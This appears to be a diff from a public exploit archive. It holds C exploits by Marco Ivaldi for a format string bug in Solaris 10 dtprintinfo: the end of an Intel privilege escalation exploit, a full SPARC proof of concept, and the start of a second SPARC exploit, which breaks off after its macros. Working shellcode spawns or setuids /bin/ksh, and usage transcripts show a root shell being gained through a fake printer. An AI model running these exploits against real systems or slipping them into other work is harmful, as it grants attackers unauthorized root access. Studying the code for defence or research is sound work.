#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/systeminfo.h>
#define INFO1 "raptor_dtprintcheckdir_intel2.c - Solaris/Intel FMT LPE"
#define INFO2 "Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/dt/bin/dtprintinfo" // vulnerable program
#define BUFSIZE 300 // size of evil env var
#define STACKPOPSEQ "%.8x" // stackpop sequence
#define STACKPOPS 14 // number of stackpops
/* replace with valid addresses for your system */
#define STRLEN 0x080994cc // .got strlen address
#define SPRINTF 0x080994e4 // .got sprintf address
#define STRDUP 0x0805df20 // .plt strdup address
#define RET 0x08067f52 // call *-0x8(%ebp) address
/* split an address in 4 bytes */
#define SPLITB(b1, b2, b3, b4, addr) { \
b1 = (addr & 0x000000ff); \
b2 = (addr & 0x0000ff00) >> 8; \
b3 = (addr & 0x00ff0000) >> 16; \
b4 = (addr & 0xff000000) >> 24; \
}
char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
/* double setuid() */
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
/* execve() */
"\x31\xc0\x50\x68/ksh\x68/bin"
"\x89\xe3\x50\x53\x89\xe2\x50"
"\x52\x53\xb0\x3b\x50\xcd\x91";
/* globals */
char *arg[2] = {"foo", NULL};
char *env[256];
int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], *p = buf;
char platform[256], release[256], display[256];
int i, stackpops = STACKPOPS;
unsigned base, n1, n2, n3, n4, n5, n6, n7, n8;
unsigned char strdup1, strdup2, strdup3, strdup4;
unsigned char ret1, ret2, ret3, ret4;
int strlen_got = STRLEN;
int sprintf_got = SPRINTF;
int strdup_plt = STRDUP;
int ret = RET;
/* lpstat code to add a fake printer */
if (!strcmp(argv[0], "lpstat")) {
/* check command line */
if (argc != 2)
exit(1);
/* print the expected output and exit */
if(!strcmp(argv[1], "-v")) {
fprintf(stderr, "lpstat called with -v\n");
printf("device for fnord: /dev/null\n");
} else {
fprintf(stderr, "lpstat called with -d\n");
printf("system default destination: fnord\n");
}
exit(0);
}
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* process command line */
if (argc != 2) {
fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
exit(1);
}
sprintf(display, "DISPLAY=%s", argv[1]);
/* evil env var: name + shellcode + padding */
bzero(buf, BUFSIZE);
sprintf(buf, "REQ_DIR=%s#", sc);
p += strlen(buf);
/* format string: .got strlen address */
*((void **)p) = (void *)(strlen_got); p += 4;
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(strlen_got + 1); p += 4;
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(strlen_got + 2); p += 4;
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(strlen_got + 3); p += 4;
memset(p, 'A', 4); p += 4; /* dummy */
/* format string: .got sprintf address */
*((void **)p) = (void *)(sprintf_got); p += 4;
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(sprintf_got + 1); p += 4;
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(sprintf_got + 2); p += 4;
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(sprintf_got + 3); p += 4;
/* format string: stackpop sequence */
base = strlen(buf) - strlen("REQ_DIR=");
for (i = 0; i < stackpops; i++, p += strlen(STACKPOPSEQ), base += 8)
strcat(p, STACKPOPSEQ);
/* calculate numeric arguments for .plt strdup address */
SPLITB(strdup1, strdup2, strdup3, strdup4, strdup_plt);
n1 = (strdup1 - base) % 0x100;
n2 = (strdup2 - base - n1) % 0x100;
n3 = (strdup3 - base - n1 - n2) % 0x100;
n4 = (strdup4 - base - n1 - n2 - n3) % 0x100;
/* calculate numeric arguments for call *-0x8(%ebp) address */
SPLITB(ret1, ret2, ret3, ret4, ret);
n5 = (ret1 - base - n1 - n2 - n3 - n4) % 0x100;
n6 = (ret2 - base - n1 - n2 - n3 - n4 - n5) % 0x100;
n7 = (ret3 - base - n1 - n2 - n3 - n4 - n5 - n6) % 0x100;
n8 = (ret4 - base - n1 - n2 - n3 - n4 - n5 - n6 - n7) % 0x100;
/* check for potentially dangerous numeric arguments below 10 */
n1 += (n1 < 10) ? (0x100) : (0);
n2 += (n2 < 10) ? (0x100) : (0);
n3 += (n3 < 10) ? (0x100) : (0);
n4 += (n4 < 10) ? (0x100) : (0);
n5 += (n5 < 10) ? (0x100) : (0);
n6 += (n6 < 10) ? (0x100) : (0);
n7 += (n7 < 10) ? (0x100) : (0);
n8 += (n8 < 10) ? (0x100) : (0);
/* format string: write string */
sprintf(p, "%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n", n1, n2, n3, n4, n5, n6, n7, n8);
/* fill the envp, keeping padding */
add_env(buf);
add_env(display);
add_env("TMP_DIR=/tmp");
add_env("PATH=.:/usr/bin");
add_env("HOME=/tmp");
add_env(NULL);
/* we need at least one directory inside TMP_DIR to trigger the bug */
mkdir("/tmp/one_dir", S_IRWXU | S_IRWXG | S_IRWXO);
/* create a symlink for the fake lpstat */
unlink("lpstat");
symlink(argv[0], "lpstat");
/* print some output */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
fprintf(stderr, "Using SI_PLATFORM\t\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using strlen address in .got\t: 0x%p\n", (void *)strlen_got);
fprintf(stderr, "Using sprintf address in .got\t: 0x%p\n", (void *)sprintf_got);
fprintf(stderr, "Using strdup address in .plt\t: 0x%p\n", (void *)strdup_plt);
fprintf(stderr, "Using call *-0x8(%%ebp) address\t: 0x%p\n\n", (void *)ret);
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
exit(1);
}
/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return env_len;
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return env_len;
}

549
exploits/solaris/local/49516.c Normal file
View file

@ -0,0 +1,549 @@
# Exploit Title: Solaris 10 1/13 (SPARC) - 'dtprintinfo' Local Privilege Escalation
# Date: 2021-02-01
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.oracle.com/solaris/solaris10/
# Version: Solaris 10
# Tested on: Solaris 10 1/13 SPARC
/*
* raptor_dtprintcheckdir_sparc.c - Solaris/SPARC FMT PoC
* Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* "Mimimimimimimi
* Mimimi only mimi
* Mimimimimimimi
* Mimimi sexy mi"
* -- Serebro
*
* As usual, exploitation on SPARC turned out to be much more complicated (and
* fun) than on Intel. Since the vulnerable program needs to survive one
* additional function before we can hijack %pc, the classic stack-based buffer
* overflow approach didn't seem feasible in this case. Therefore, I opted for
* the format string bug. This is just a proof of concept, 'cause guess what --
* on my system it works only when gdb or truss are attached to the target
* process:( To borrow Neel Mehta's words:
*
* "It's quite common to find an exploit that only works with GDB attached to
* the process, simply because without the debugger, break register windows
* aren't flushed to the stack and the overwrite has no effect."
* -- The Shellcoder's Handbook
*
* On different hardware configurations this exploit might work if the correct
* retloc and offset are provided. It might also be possible to force a context
* switch at the right time that results in registers being flushed to the
* stack at the right moment. However, this method tends to be unreliable even
* when the attack is repeatable like in this case. A better way to solve the
* puzzle would be to overwrite something different, e.g.:
*
* - Activation records of other functions, such as check_dir() (same issues)
* - Callback to function SortJobs() (nope, address is hardcoded in .text)
* - PLT in the binary (I need a different technique to handle null bytes)
* - PLT (R_SPARC_JMP_SLOT) in libc (no null bytes, this looks promising!)
* - Other OS function pointers I'm not aware of still present in Solaris 10
*
* Finally, it might be possible to combine the stack-based buffer overflow and
* the format string bug to surgically fix addresses and survive until needed
* for program flow hijacking to be possible. Bottom line: there's still some
* work to do to obtain a reliable exploit, but I think it's feasible. You're
* welcome to try yourself if you feel up to the task and have a spare SPARC
* box;) [spoiler alert: I did it myself, see raptor_dtprintcheckdir_sparc2.c]
*
* This bug was likely fixed during the general cleanup of CDE code done by
* Oracle in response to my recently reported vulnerabilities. However, I can't
* confirm this because I have no access to their patches:/
*
* See also:
* raptor_dtprintcheckdir_intel.c (vulnerability found by Marti Guasch Jimenez)
* raptor_dtprintcheckdir_intel2.c
* raptor_dtprintcheckdir_sparc2.c (the real deal)
*
* Usage:
* $ gcc raptor_dtprintcheckdir_sparc.c -o raptor_dtprintcheckdir_sparc -Wall
* [on your xserver: disable the access control]
* $ truss -u a.out -u '*' -fae ./raptor_dtprintcheckdir_sparc 192.168.1.1:0
* [on your xserver: double click on the fake "fnord" printer]
* ...
* -> __0FJcheck_dirPcTBPPP6QStatusLineStructPii(0xfe584e58, 0xff2a4042, 0x65db0, 0xffbfc50c)
* -> libc:getenv(0x4e8f8, 0x0, 0x0, 0x0)
* <- libc:getenv() = 0xffbff364
* -> libc:getenv(0x4e900, 0x1, 0xf9130, 0x0)
* <- libc:getenv() = 0xffbff364
* -> libc:sprintf(0xffbfc1bc, 0xffbff364, 0xff2a4042, 0x0)
* ...
* setuid(0) = 0
* chmod("/bin/ksh", 037777777777) = 0
* _exit(0)
* $ ksh
* # id
* uid=100(user) gid=1(other) euid=0(root) egid=2(bin)
* #
*
* Tested on:
* SunOS 5.10 Generic_Virtual sun4u sparc SUNW,SPARC-Enterprise
* [previous Solaris versions are also likely vulnerable (and easier to exploit)]
*/
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/systeminfo.h>
#define INFO1 "raptor_dtprintcheckdir_sparc.c - Solaris/SPARC FMT PoC"
#define INFO2 "Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/dt/bin/dtprintinfo" // vulnerable program
#define BUFSIZE 3000 // size of evil env var
#define BUFSIZE2 10000 // size of padding buf
#define STACKPOPSEQ "%.8x" // stackpop sequence
#define STACKPOPS 383 // number of stackpops
/* default retloc and offset for sprintf() */
#define RETLOC 0xffbfbb3c // saved ret location
#define OFFSET 84 // offset from retloc to i0loc
/* default retloc and offset for check_dir() */
/* TODO: patch %i6 that gets corrupted by overflow */
//#define RETLOC 0xffbfbbac // default saved ret location
//#define OFFSET 1884 // default offset from retloc to i0loc
/* split an address in 4 bytes */
#define SPLITB(B1, B2, B3, B4, ADDR) { \
B4 = (ADDR & 0x000000ff); \
B3 = (ADDR & 0x0000ff00) >> 8; \
B2 = (ADDR & 0x00ff0000) >> 16; \
B1 = (ADDR & 0xff000000) >> 24; \
}
/* calculate numeric arguments for write string */
#define CALCARGS(N1, N2, N3, N4, B1, B2, B3, B4, BASE) { \
N1 = (B4 - BASE) % 0x100; \
N2 = (B2 - BASE - N1) % 0x100; \
N3 = (B1 - BASE - N1 - N2) % 0x100; \
N4 = (B3 - BASE - N1 - N2 - N3) % 0x100; \
BASE += N1 + N2 + N3 + N4; \
}
//#define USE_EXEC_SC // uncomment to use exec shellcode
#ifdef USE_EXEC_SC
char sc[] = /* Solaris/SPARC execve() shellcode (12 + 48 = 60 bytes) */
/* setuid(0) */
"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
"\x82\x10\x20\x17" /* mov 0x17, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
/* execve("/bin/ksh", argv, NULL) */
"\x9f\x41\x40\x01" /* rd %pc,%o7 ! >= sparcv8+ */
"\x90\x03\xe0\x28" /* add %o7, 0x28, %o0 */
"\x92\x02\x20\x10" /* add %o0, 0x10, %o1 */
"\xc0\x22\x20\x08" /* clr [ %o0 + 8 ] */
"\xd0\x22\x20\x10" /* st %o0, [ %o0 + 0x10 ] */
"\xc0\x22\x20\x14" /* clr [ %o0 + 0x14 ] */
"\x82\x10\x20\x0b" /* mov 0xb, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\x80\x1c\x40\x11" /* xor %l1, %l1, %g0 ! nop */
"\x41\x41\x41\x41" /* placeholder */
"/bin/ksh";
#else
char sc[] = /* Solaris/SPARC chmod() shellcode (12 + 32 + 20 = 64 bytes) */
/* setuid(0) */
"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
"\x82\x10\x20\x17" /* mov 0x17, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
/* chmod("/bin/ksh", 037777777777) */
"\x92\x20\x20\x01" /* sub %g0, 1, %o1 */
"\x20\xbf\xff\xff" /* bn,a <sc - 4> */
"\x20\xbf\xff\xff" /* bn,a <sc> */
"\x7f\xff\xff\xff" /* call <sc + 4> */
"\x90\x03\xe0\x20" /* add %o7, 0x20, %o0 */
"\xc0\x22\x20\x08" /* clr [ %o0 + 8 ] */
"\x82\x10\x20\x0f" /* mov 0xf, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
/* exit(0) */
"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
"\x82\x10\x20\x01" /* mov 1, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh";
#endif /* USE_EXEC_SC */
/* globals */
char *arg[2] = {"foo", NULL};
char *env[256];
int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
void check_zero(int addr, char *pattern);
int get_env_addr(char *path, char **argv);
int search_ldso(char *sym);
int search_rwx_mem(void);
void set_val(char *buf, int pos, int val);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], *p = buf, buf2[BUFSIZE2];
char platform[256], release[256], display[256];
int env_addr, sc_addr, retloc = RETLOC, i0loc, i1loc, i7loc;
int offset = OFFSET;
int sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
int ret = search_ldso("sprintf");
int rwx_mem = search_rwx_mem() + 24; /* stable address */
int i, stackpops = STACKPOPS;
unsigned char b1, b2, b3, b4;
unsigned base, n[16]; /* must be unsigned */
/* lpstat code to add a fake printer */
if (!strcmp(argv[0], "lpstat")) {
/* check command line */
if (argc != 2)
exit(1);
/* print the expected output and exit */
if(!strcmp(argv[1], "-v")) {
fprintf(stderr, "lpstat called with -v\n");
printf("device for fnord: /dev/null\n");
} else {
fprintf(stderr, "lpstat called with -d\n");
printf("system default destination: fnord\n");
}
exit(0);
}
/* helper program that prints argv[0] address, used by get_env_addr() */
if (!strcmp(argv[0], "foo")) {
printf("0x%p\n", argv[0]);
exit(0);
}
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* process command line */
if ((argc < 2) || (argc > 4)) {
#ifdef USE_EXEC_SC
fprintf(stderr, "usage: %s xserver:display [retloc] [offset]\n\n", argv[0]);
#else
fprintf(stderr, "usage:\n$ %s xserver:display [retloc] [offset]\n$ /bin/ksh\n\n", argv[0]);
#endif /* USE_EXEC_SC */
exit(1);
}
sprintf(display, "DISPLAY=%s", argv[1]);
if (argc > 2)
retloc = (int)strtoul(argv[2], (char **)NULL, 0);
if (argc > 3)
offset = (int)strtoul(argv[3], (char **)NULL, 0);
/* calculate saved %i0 and %i7 locations based on retloc */
i0loc = retloc + offset;
i1loc = i0loc + 4;
i7loc = i0loc + 28;
/* evil env var: name + shellcode + padding */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;
memcpy(buf, "REQ_DIR=", strlen("REQ_DIR="));
p += strlen("REQ_DIR=");
/* padding buffer to avoid stack overflow */
memset(buf2, 'B', sizeof(buf2));
buf2[sizeof(buf2) - 1] = 0x0;
/* fill the envp, keeping padding */
add_env(buf2);
add_env(buf);
add_env(display);
add_env("TMP_DIR=/tmp");
add_env("PATH=.:/usr/bin");
sc_addr = add_env("HOME=/tmp");
add_env(sc);
add_env(NULL);
/* calculate the needed addresses */
env_addr = get_env_addr(VULN, argv);
sc_addr += env_addr;
#ifdef USE_EXEC_SC
/* populate exec shellcode placeholder */
set_val(sc, 48, sb - 1024);
#endif /* USE_EXEC_SC */
/* format string: saved ret */
*((void **)p) = (void *)(retloc); p += 4; /* 0x000000ff */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(retloc); p += 4; /* 0x00ff0000 */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(retloc); p += 4; /* 0xff000000 */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(retloc + 2); p += 4; /* 0x0000ff00 */
memset(p, 'A', 4); p += 4; /* dummy */
/* format string: saved %i0: 1st arg to sprintf() */
*((void **)p) = (void *)(i0loc); p += 4; /* 0x000000ff */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i0loc); p += 4; /* 0x00ff0000 */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i0loc); p += 4; /* 0xff000000 */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i0loc + 2); p += 4; /* 0x0000ff00 */
memset(p, 'A', 4); p += 4; /* dummy */
/* format string: saved %i7: return address */
*((void **)p) = (void *)(i7loc); p += 4; /* 0x000000ff */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i7loc); p += 4; /* 0x00ff0000 */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i7loc); p += 4; /* 0xff000000 */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i7loc + 2); p += 4; /* 0x0000ff00 */
memset(p, 'A', 4); p += 4; /* dummy */
/* format string: saved %i1: 2nd arg to sprintf() */
*((void **)p) = (void *)(i1loc); p += 4; /* 0x000000ff */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i1loc); p += 4; /* 0x00ff0000 */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i1loc); p += 4; /* 0xff000000 */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i1loc + 2); p += 4; /* 0x0000ff00 */
/* format string: stackpop sequence */
base = p - buf - strlen("REQ_DIR=");
for (i = 0; i < stackpops; i++, p += strlen(STACKPOPSEQ), base += 8)
memcpy(p, STACKPOPSEQ, strlen(STACKPOPSEQ));
/* calculate numeric arguments for retloc */
SPLITB(b1, b2, b3, b4, (ret - 4));
CALCARGS(n[0], n[1], n[2], n[3], b1, b2, b3, b4, base);
/* calculate numeric arguments for i0loc */
SPLITB(b1, b2, b3, b4, rwx_mem);
CALCARGS(n[4], n[5], n[6], n[7], b1, b2, b3, b4, base);
/* calculate numeric arguments for i7loc */
SPLITB(b1, b2, b3, b4, (rwx_mem - 8));
CALCARGS(n[8], n[9], n[10], n[11], b1, b2, b3, b4, base);
/* calculate numeric arguments for i1loc */
SPLITB(b1, b2, b3, b4, sc_addr);
CALCARGS(n[12], n[13], n[14], n[15], b1, b2, b3, b4, base);
/* check for potentially dangerous numeric arguments below 10 */
for (i = 0; i < 16; i++)
n[i] += (n[i] < 10) ? (0x100) : (0);
/* format string: write string */
sprintf(p, "%%.%dx%%n%%.%dx%%hn%%.%dx%%hhn%%.%dx%%hhn%%.%dx%%n%%.%dx%%hn%%.%dx%%hhn%%.%dx%%hhn%%.%dx%%n%%.%dx%%hn%%.%dx%%hhn%%.%dx%%hhn%%.%dx%%n%%.%dx%%hn%%.%dx%%hhn%%.%dx%%hhn", n[0], n[1], n[2], n[3], n[4], n[5], n[6], n[7], n[8], n[9], n[10], n[11], n[12], n[13], n[14], n[15]);
buf[strlen(buf)] = 'A'; /* preserve buf length */
/* we need at least one directory inside TMP_DIR to trigger the bug */
mkdir("/tmp/one_dir", S_IRWXU | S_IRWXG | S_IRWXO);
/* create a symlink for the fake lpstat */
unlink("lpstat");
symlink(argv[0], "lpstat");
/* print some output */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using ret location\t: 0x%p\n", (void *)retloc);
fprintf(stderr, "Using %%i0 location\t: 0x%p\n", (void *)i0loc);
fprintf(stderr, "Using %%i1 location\t: 0x%p\n", (void *)i1loc);
fprintf(stderr, "Using %%i7 location\t: 0x%p\n", (void *)i7loc);
fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
fprintf(stderr, "Using sprintf() address\t: 0x%p\n\n", (void *)ret);
/* check for null bytes (add some padding to env if needed) */
check_zero(retloc, "ret location");
check_zero(i0loc, "%%i0 location");
check_zero(i1loc, "%%i1 location");
check_zero(i7loc, "%%i7 location");
check_zero(rwx_mem, "rwx_mem address");
check_zero(sc_addr, "sc address");
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
exit(1);
}
/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return env_len;
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return env_len;
}
/*
* check_zero(): check an address for the presence of a 0x00
*/
void check_zero(int addr, char *pattern)
{
if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
!(addr & 0xff000000)) {
fprintf(stderr, "error: %s contains a 0x00!\n", pattern);
exit(1);
}
}
/*
* get_env_addr(): get environment address using a helper program
*/
int get_env_addr(char *path, char **argv)
{
char prog[] = "./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
char hex[11] = "\x00";
int fd[2], addr;
/* truncate program name at correct length and create a hard link */
prog[strlen(path)] = 0x0;
unlink(prog);
link(argv[0], prog);
/* open pipe to read program output */
if (pipe(fd) < 0) {
perror("pipe");
exit(1);
}
switch(fork()) {
case -1: /* cannot fork */
perror("fork");
exit(1);
case 0: /* child */
dup2(fd[1], 1);
close(fd[0]);
close(fd[1]);
execve(prog, arg, env);
perror("execve");
exit(1);
default: /* parent */
close(fd[1]);
read(fd[0], hex, sizeof(hex));
break;
}
/* check and return address */
if (!(addr = (int)strtoul(hex, (char **)NULL, 0))) {
fprintf(stderr, "error: cannot read ff address from helper program\n");
exit(1);
}
return addr + 4;
}
/*
* search_ldso(): search for a symbol inside ld.so.1
*/
int search_ldso(char *sym)
{
int addr;
void *handle;
Link_map *lm;
/* open the executable object file */
if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
perror("dlopen");
exit(1);
}
/* get dynamic load information */
if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
perror("dlinfo");
exit(1);
}
/* search for the address of the symbol */
if ((addr = (int)dlsym(handle, sym)) == NULL) {
fprintf(stderr, "error: sorry, function %s() not found\n", sym);
exit(1);
}
/* close the executable object file */
dlclose(handle);
check_zero(addr - 4, sym);
return addr;
}
/*
* search_rwx_mem(): search for an RWX memory segment valid for all
* programs (typically, /usr/lib/ld.so.1) using the proc filesystem
*/
int search_rwx_mem(void)
{
int fd;
char tmp[16];
prmap_t map;
int addr = 0, addr_old;
/* open the proc filesystem */
sprintf(tmp,"/proc/%d/map", (int)getpid());
if ((fd = open(tmp, O_RDONLY)) < 0) {
fprintf(stderr, "error: can't open %s\n", tmp);
exit(1);
}
/* search for the last RWX memory segment before stack (last - 1) */
while (read(fd, &map, sizeof(map)))
if (map.pr_vaddr)
if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
addr_old = addr;
addr = map.pr_vaddr;
}
close(fd);
/* add 4 to the exact address null bytes */
if (!(addr_old & 0xff))
addr_old |= 0x04;
if (!(addr_old & 0xff00))
addr_old |= 0x0400;
return addr_old;
}
/*
* set_val(): copy a dword inside a buffer
*/
void set_val(char *buf, int pos, int val)
{
buf[pos] = (val & 0xff000000) >> 24;
buf[pos + 1] = (val & 0x00ff0000) >> 16;
buf[pos + 2] = (val & 0x0000ff00) >> 8;
buf[pos + 3] = (val & 0x000000ff);
}

309
exploits/solaris/local/49517.c Normal file
View file

@ -0,0 +1,309 @@
# Exploit Title: Solaris 10 1/13 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)
# Date: 2021-02-01
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.oracle.com/solaris/solaris10/
# Version: Solaris 10
# Tested on: Solaris 10 1/13 SPARC
/*
* raptor_dtprintcheckdir_sparc2.c - Solaris/SPARC FMT LPE
* Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* "You still haven't given up on me?" -- Bruce Wayne
* "Never!" -- Alfred Pennyworth
*
* I would like to thank ~A. for his incredible research work spanning decades,
* an endless source of inspiration for me.
*
* Whoah, this one wasn't easy! This is a pretty lean exploit now, but its
* development took me some time. It's been almost two weeks, and I came
* close to giving up a couple of times. Here's a summary of the main
* roadblocks and complications I ran into while porting my dtprintinfo
* format string exploit to SPARC:
*
* - Half word writes and similar techniques that need to print a large amount
* of chars are problematic, because we have both a format string bug and a
* stack-based buffer overflow, and we risk running out of stack space! We
* might be able to prevent this by increasing the size of the padding buffer,
* (buf2) but your mileage may vary.
*
* - I therefore opted for a more portable single-byte write, but SPARC is a
* RISC architecture and as such it's not happy with memory operations on
* misaligned addresses... So I had to figure out a possibly novel technique
* to prevent the dreaded Bus Error. It involves the %hhn format string, check
* it out!
*
* - Once I had my write-what primitive figured out, I needed to pick a suitable
* memory location to patch... and I almost ran out of options. Function
* activation records turned out to be cumbersome and unreliable (see my PoC
* raptor_dtprintcheckdir_sparc.c), .plt entries in the vulnerable binary
* start with a null byte, and the usual OS function pointers that were
* popular targets 15 years ago are not present in modern Solaris 10 releases
* anymore. Finally, I noticed that the libc also contains .plt jump codes
* that get executed upon function calling. Since they don't start with a null
* byte, I decided to target them.
*
* - Instead of meddling with jump codes, to keep things simpler I decided to
* craft the shellcode directly in the .plt section of libc by exploiting the
* format string bug. This technique proved to be very effective, but
* empirical tests showed that (for unknown reasons) the shellcode size was
* limited to 36 bytes. It looks like there's a limit on the number of args,
* to sprintf(), unrelated to where we write in memory. Who cares, 36 bytes
* are just enough to escalate privileges.
*
* After I plugged a small custom shellcode into my exploit, it worked like a
* charm. Simple, isn't it?;)
*
* To get the libc base, use pmap on the dtprintinfo process, e.g.:
* $ pmap 4190 | grep libc.so.1 | grep r-x
* FE800000 1224K r-x-- /lib/libc.so.1
*
* To grab the offset to strlen in .plt, you can use objdump as follows:
* $ objdump -R /usr/lib/libc.so.1 | grep strlen
* 0014369c R_SPARC_JMP_SLOT strlen
*
* This bug was likely fixed during the general cleanup of CDE code done by
* Oracle in response to my recently reported vulnerabilities. However, I can't
* confirm this because I have no access to their patches:/
*
* See also:
* raptor_dtprintcheckdir_intel.c (vulnerability found by Marti Guasch Jimenez)
* raptor_dtprintcheckdir_intel2.c
* raptor_dtprintcheckdir_sparc.c (just a proof of concept)
*
* Usage:
* $ gcc raptor_dtprintcheckdir_sparc2.c -o raptor_dtprintcheckdir_sparc2 -Wall
* [on your xserver: disable the access control]
* $ ./raptor_dtprintcheckdir_sparc2 10.0.0.104:0
* raptor_dtprintcheckdir_sparc2.c - Solaris/SPARC FMT LPE
* Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Using SI_PLATFORM : SUNW,SPARC-Enterprise (5.10)
* Using libc/.plt/strlen : 0xfe94369c
*
* Don't worry if you get a SIGILL, just run /bin/ksh anyway!
*
* lpstat called with -v
* lpstat called with -v
* lpstat called with -d
* [on your xserver: double click on the fake "fnord" printer]
* Illegal Instruction
* $ ls -l /bin/ksh
* -rwsrwsrwx 3 root bin 209288 Feb 21 2012 /bin/ksh
* $ ksh
* # id
* uid=100(user) gid=1(other) euid=0(root) egid=2(bin)
* #
*
* Tested on:
* SunOS 5.10 Generic_Virtual sun4u sparc SUNW,SPARC-Enterprise
* [previous Solaris versions are also likely vulnerable (and easier to exploit)]
*/
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/systeminfo.h>
#define INFO1 "raptor_dtprintcheckdir_sparc2.c - Solaris/SPARC FMT LPE"
#define INFO2 "Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/dt/bin/dtprintinfo" // vulnerable program
#define BUFSIZE 3000 // size of evil env var
#define BUFSIZE2 10000 // size of padding buf
#define STACKPOPSEQ "%.8x" // stackpop sequence
#define STACKPOPS 383 // number of stackpops
/* default retloc is .plt/strlen in libc */
#define LIBCBASE 0xfe800000 // base address of libc
#define STRLEN 0x0014369c // .plt/strlen offset
/* calculate numeric arguments for write string */
#define CALCARGS(N1, N2, N3, N4, B1, B2, B3, B4, BASE) { \
N1 = (B4 - BASE) % 0x100; \
N2 = (B2 - BASE - N1) % 0x100; \
N3 = (B1 - BASE - N1 - N2) % 0x100; \
N4 = (B3 - BASE - N1 - N2 - N3) % 0x100; \
BASE += N1 + N2 + N3 + N4; \
}
